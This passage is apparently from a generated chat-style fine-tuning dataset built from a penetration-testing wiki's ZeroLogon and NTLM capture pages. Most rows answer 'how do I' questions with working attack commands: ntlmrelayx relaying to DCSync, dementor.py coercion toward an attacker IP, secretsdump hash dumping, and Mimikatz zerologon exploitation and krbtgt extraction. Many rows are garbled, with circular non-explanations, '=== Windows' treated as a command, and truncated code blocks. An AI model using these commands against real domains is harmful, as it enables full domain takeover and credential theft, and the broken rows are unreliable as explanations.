PrinterBug.\n\n`bash\ndementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1\n``", "metadata": {"corpus_index": 923, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ZeroLogon - Authentication relay technique during a pentest?"}, {"role": "assistant", "content": "Another technique, showcased by Dirk-jan no later than 2 weeks after the public disclosure, highlighted another way of exploiting the vulnerability. That technique relies on a relayed authentication to directly operate a DCSync, hence having no impact on the continuity of services.\n\nIn order to operate the attack, the Impacket's script ntlmrelayx (Python) can be used.\n\n``bash\nntlmrelayx -t dcsync://$domain_controller_2 -smb2support\n`\n\nOnce the relay servers are up and running and waiting for incoming trafic, attackers need to coerce a Domain Controller's authentication (or from another account with enough privileges). One way of doing this is to rely on the PrinterBug.\n\n`bash\ndementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ZeroLogon - Authentication relay technique during a pentest?", "response": "Another technique, showcased by Dirk-jan no later than 2 weeks after the public disclosure, highlighted another way of exploiting the vulnerability. That technique relies on a relayed authentication to directly operate a DCSync, hence having no impact on the continuity of services.\n\nIn order to operate the attack, the Impacket's script ntlmrelayx (Python) can be used.\n\n``bash\nntlmrelayx -t dcsync://$domain_controller_2 -smb2support\n`\n\nOnce the relay servers are up and running and waiting for incoming trafic, attackers need to coerce a Domain Controller's authentication (or from another account with enough privileges). One way of doing this is to rely on the PrinterBug.\n\n`bash\ndementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1\n``", "metadata": {"corpus_index": 923, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntlmrelayx syntax for zerologon - authentication relay technique?"}, {"role": "assistant", "content": "ntlmrelayx -t dcsync://$domain_controller_2 -smb2support"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntlmrelayx syntax for zerologon - authentication relay technique?", "response": "ntlmrelayx -t dcsync://$domain_controller_2 -smb2support", "metadata": {"corpus_index": 924, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ZeroLogon - Authentication relay technique during a pentest?"}, {"role": "assistant", "content": "ntlmrelayx -t dcsync://$domain_controller_2 -smb2support"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ZeroLogon - Authentication relay technique during a pentest?", "response": "ntlmrelayx -t dcsync://$domain_controller_2 -smb2support", "metadata": {"corpus_index": 924, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx -t dcsync://$domain_controller_2 -smb2support`?"}, {"role": "assistant", "content": "This command is used for zerologon - authentication relay technique. Authentication relay technique"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx -t dcsync://$domain_controller_2 -smb2support`?", "response": "This command is used for zerologon - authentication relay technique. Authentication relay technique", "metadata": {"corpus_index": 924, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use dementor.py for zerologon - authentication relay technique?"}, {"role": "assistant", "content": "dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use dementor.py for zerologon - authentication relay technique?", "response": "dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1", "metadata": {"corpus_index": 925, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dementor.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ZeroLogon - Authentication relay technique"}, {"role": "assistant", "content": "dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ZeroLogon - Authentication relay technique", "response": "dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1", "metadata": {"corpus_index": 925, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1`?"}, {"role": "assistant", "content": "This command is used for zerologon - authentication relay technique. Authentication relay technique"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1`?", "response": "This command is used for zerologon - authentication relay technique. Authentication relay technique", "metadata": {"corpus_index": 925, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ZeroLogon - Password change ( :warning: disruptive)?"}, {"role": "assistant", "content": "> [!CAUTION]\n> This technique can break the domain's replication services hence leading to massive disruption, running the following \"password change\" technique is not advised.\n\nThis exploit scenario changes the NT hash of the domain controller computer account in Active Directory, but not in the local SAM database, hence creating some issues in Active Directory domains. In order to prevent disruption as much as possible, attackers can try to exploit the CVE, find the NT hash of the Domain Controller account before it was changed, and set it back in Active Directory.\n\n::: tabs\n\n=== UNIX-like\n\nThe original attack path can be conducted from UNIX-like systems with the following Python scripts.\n\n* Secura BV's scanning PoC\n* Dirk-Jan's exploit script\n* Dirk-Jan's restore script\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ZeroLogon - Password change ( :warning: disruptive)?", "response": "> [!CAUTION]\n> This technique can break the domain's replication services hence leading to massive disruption, running the following \"password change\" technique is not advised.\n\nThis exploit scenario changes the NT hash of the domain controller computer account in Active Directory, but not in the local SAM database, hence creating some issues in Active Directory domains. In order to prevent disruption as much as possible, attackers can try to exploit the CVE, find the NT hash of the Domain Controller account before it was changed, and set it back in Active Directory.\n\n::: tabs\n\n=== UNIX-like\n\nThe original attack path can be conducted from UNIX-like systems with the following Python scripts.\n\n* Secura BV's scanning PoC\n* Dirk-Jan's exploit script\n* Dirk-Jan's restore script\n\n```bash", "metadata": {"corpus_index": 926, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ZeroLogon - Password change ( :warning: disruptive)"}, {"role": "assistant", "content": "> [!CAUTION]\n> This technique can break the domain's replication services hence leading to massive disruption, running the following \"password change\" technique is not advised.\n\nThis exploit scenario changes the NT hash of the domain controller computer account in Active Directory, but not in the local SAM database, hence creating some issues in Active Directory domains. In order to prevent disruption as much as possible, attackers can try to exploit the CVE, find the NT hash of the Domain Controller account before it was changed, and set it back in Active Directory.\n\n::: tabs\n\n=== UNIX-like\n\nThe original attack path can be conducted from UNIX-like systems with the following Python scripts.\n\n* Secura BV's scanning PoC\n* Dirk-Jan's exploit script\n* Dirk-Jan's restore script\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ZeroLogon - Password change ( :warning: disruptive)", "response": "> [!CAUTION]\n> This technique can break the domain's replication services hence leading to massive disruption, running the following \"password change\" technique is not advised.\n\nThis exploit scenario changes the NT hash of the domain controller computer account in Active Directory, but not in the local SAM database, hence creating some issues in Active Directory domains. In order to prevent disruption as much as possible, attackers can try to exploit the CVE, find the NT hash of the Domain Controller account before it was changed, and set it back in Active Directory.\n\n::: tabs\n\n=== UNIX-like\n\nThe original attack path can be conducted from UNIX-like systems with the following Python scripts.\n\n* Secura BV's scanning PoC\n* Dirk-Jan's exploit script\n* Dirk-Jan's restore script\n\n```bash", "metadata": {"corpus_index": 926, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Obtain the Domain Admin's NT hash work?"}, {"role": "assistant", "content": "secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Obtain the Domain Admin's NT hash work?", "response": "secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'", "metadata": {"corpus_index": 927, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Obtain the Domain Admin's NT hash?"}, {"role": "assistant", "content": "secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Obtain the Domain Admin's NT hash?", "response": "secretsdump -no-pass 'Domain'/'DC_computer_account$'@'Domain_controller'", "metadata": {"corpus_index": 927, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Obtain the machine account hex encoded password with the domain admin credentials?"}, {"role": "assistant", "content": "secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Obtain the machine account hex encoded password with the domain admin credentials?", "response": "secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'", "metadata": {"corpus_index": 928, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Obtain the machine account hex encoded password with the domain admin credentials"}, {"role": "assistant", "content": "secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Obtain the machine account hex encoded password with the domain admin credentials", "response": "secretsdump -hashes :'NThash' 'Domain'/'Domain_admin'@'Domain_controller'", "metadata": {"corpus_index": 928, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Restore the machine account password work?"}, {"role": "assistant", "content": "zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'\n``\n\n=== Windows\n\nThe attack can also be conducted from Windows systems with Mimikatz (C) using lsadump::zerologon to scan and exploit it, then obtain the krbtgt with lsadump::dcsync and reset the DC account with lsadump::postzerologon or use lsadump::changentlm.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Restore the machine account password work?", "response": "zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'\n``\n\n=== Windows\n\nThe attack can also be conducted from Windows systems with Mimikatz (C) using lsadump::zerologon to scan and exploit it, then obtain the krbtgt with lsadump::dcsync and reset the DC account with lsadump::postzerologon or use lsadump::changentlm.\n\n``powershell", "metadata": {"corpus_index": 929, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Restore the machine account password?"}, {"role": "assistant", "content": "zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'\n``\n\n=== Windows\n\nThe attack can also be conducted from Windows systems with Mimikatz (C) using lsadump::zerologon to scan and exploit it, then obtain the krbtgt with lsadump::dcsync and reset the DC account with lsadump::postzerologon or use lsadump::changentlm.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Restore the machine account password?", "response": "zerologon-restore 'Domain'/'DC_account'@'Domain_controller' -target-ip 'DC_IP_address' -hexpass 'DC_hexpass'\n``\n\n=== Windows\n\nThe attack can also be conducted from Windows systems with Mimikatz (C) using lsadump::zerologon to scan and exploit it, then obtain the krbtgt with lsadump::dcsync and reset the DC account with lsadump::postzerologon or use lsadump::changentlm.\n\n``powershell", "metadata": {"corpus_index": 929, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Restore the machine account password?"}, {"role": "assistant", "content": "=== Windows\n\nThe attack can also be conducted from Windows systems with [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) using [`lsadump::zerologon`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/zerologon) to scan and exploit it, then obtain the krbtgt with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync) and reset the DC account with [`lsadump::postzerologon`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/postzerologon) or use [`lsadump::changentlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/changentlm)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Restore the machine account password?", "response": "=== Windows\n\nThe attack can also be conducted from Windows systems with [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) using [`lsadump::zerologon`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/zerologon) to scan and exploit it, then obtain the krbtgt with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync) and reset the DC account with [`lsadump::postzerologon`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/postzerologon) or use [`lsadump::changentlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/changentlm).", "metadata": {"corpus_index": 930, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for restore the machine account password. Restore the machine account password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for restore the machine account password. Restore the machine account password", "metadata": {"corpus_index": 930, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Scan for the vulnerability"}, {"role": "assistant", "content": "lsadump::zerologon /target:'Domain_controller' /account:'DC_account$'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Scan for the vulnerability", "response": "lsadump::zerologon /target:'Domain_controller' /account:'DC_account$'", "metadata": {"corpus_index": 931, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Scan for the vulnerability during a pentest?"}, {"role": "assistant", "content": "lsadump::zerologon /target:'Domain_controller' /account:'DC_account$'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Scan for the vulnerability during a pentest?", "response": "lsadump::zerologon /target:'Domain_controller' /account:'DC_account$'", "metadata": {"corpus_index": 931, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Exploit the vulnerability: set the NT hash to \\x00*8?"}, {"role": "assistant", "content": "lsadump::zerologon /exploit /target:'Domain_controller' /account:'DC_account$'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Exploit the vulnerability: set the NT hash to \\x00*8?", "response": "lsadump::zerologon /exploit /target:'Domain_controller' /account:'DC_account$'", "metadata": {"corpus_index": 932, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Exploit the vulnerability: set the NT hash to \\x00*8?"}, {"role": "assistant", "content": "lsadump::zerologon /exploit /target:'Domain_controller' /account:'DC_account$'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Exploit the vulnerability: set the NT hash to \\x00*8?", "response": "lsadump::zerologon /exploit /target:'Domain_controller' /account:'DC_account$'", "metadata": {"corpus_index": 932, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Obtain the krbtgt by DCSync?"}, {"role": "assistant", "content": "lsadump::dcsync /domain:'Domain' /dc:'Domain_controller' /user:'Administrator' /authuser:'DC_account$' /authdomain:'Domain' /authpassword:'' /authntlm"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Obtain the krbtgt by DCSync?", "response": "lsadump::dcsync /domain:'Domain' /dc:'Domain_controller' /user:'Administrator' /authuser:'DC_account$' /authdomain:'Domain' /authpassword:'' /authntlm", "metadata": {"corpus_index": 933, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Obtain the krbtgt by DCSync?"}, {"role": "assistant", "content": "lsadump::dcsync /domain:'Domain' /dc:'Domain_controller' /user:'Administrator' /authuser:'DC_account$' /authdomain:'Domain' /authpassword:'' /authntlm"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Obtain the krbtgt by DCSync?", "response": "lsadump::dcsync /domain:'Domain' /dc:'Domain_controller' /user:'Administrator' /authuser:'DC_account$' /authdomain:'Domain' /authpassword:'' /authntlm", "metadata": {"corpus_index": 933, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Reset the DC account's password in AD and in its SAM base"}, {"role": "assistant", "content": "lsadump::postzerologon /target:'Domain_Controller' /account:'DC_account$'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Reset the DC account's password in AD and in its SAM base", "response": "lsadump::postzerologon /target:'Domain_Controller' /account:'DC_account$'", "metadata": {"corpus_index": 934, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Reset the DC account's password in AD and in its SAM base"}, {"role": "assistant", "content": "lsadump::postzerologon /target:'Domain_Controller' /account:'DC_account$'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Reset the DC account's password in AD and in its SAM base", "response": "lsadump::postzerologon /target:'Domain_Controller' /account:'DC_account$'", "metadata": {"corpus_index": 934, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does (alternative to postezerologon) Change the NT hash of the domain controller machine account in the AD back to its original value work?"}, {"role": "assistant", "content": "lsadump::changentlm /server:'Domain_controller' /user:'DC_account$' /oldntlm:'31d6cfe0d16ae931b73c59d7e0c089c0' /newntlm:'previous_NThash'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does (alternative to postezerologon) Change the NT hash of the domain controller machine account in the AD back to its original value work?", "response": "lsadump::changentlm /server:'Domain_controller' /user:'DC_account$' /oldntlm:'31d6cfe0d16ae931b73c59d7e0c089c0' /newntlm:'previous_NThash'\n```\n\n:::", "metadata": {"corpus_index": 935, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on (alternative to postezerologon) Change the NT hash of the domain controller machine account in the AD back to its original value"}, {"role": "assistant", "content": "lsadump::changentlm /server:'Domain_controller' /user:'DC_account$' /oldntlm:'31d6cfe0d16ae931b73c59d7e0c089c0' /newntlm:'previous_NThash'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on (alternative to postezerologon) Change the NT hash of the domain controller machine account in the AD back to its original value", "response": "lsadump::changentlm /server:'Domain_controller' /user:'DC_account$' /oldntlm:'31d6cfe0d16ae931b73c59d7e0c089c0' /newntlm:'previous_NThash'\n```\n\n:::", "metadata": {"corpus_index": 935, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Capture - Theory?"}, {"role": "assistant", "content": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the hash (LM or NTLM hash, a.k.a. response) sent by the victim."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Capture - Theory?", "response": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the hash (LM or NTLM hash, a.k.a. response) sent by the victim.", "metadata": {"corpus_index": 936, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration 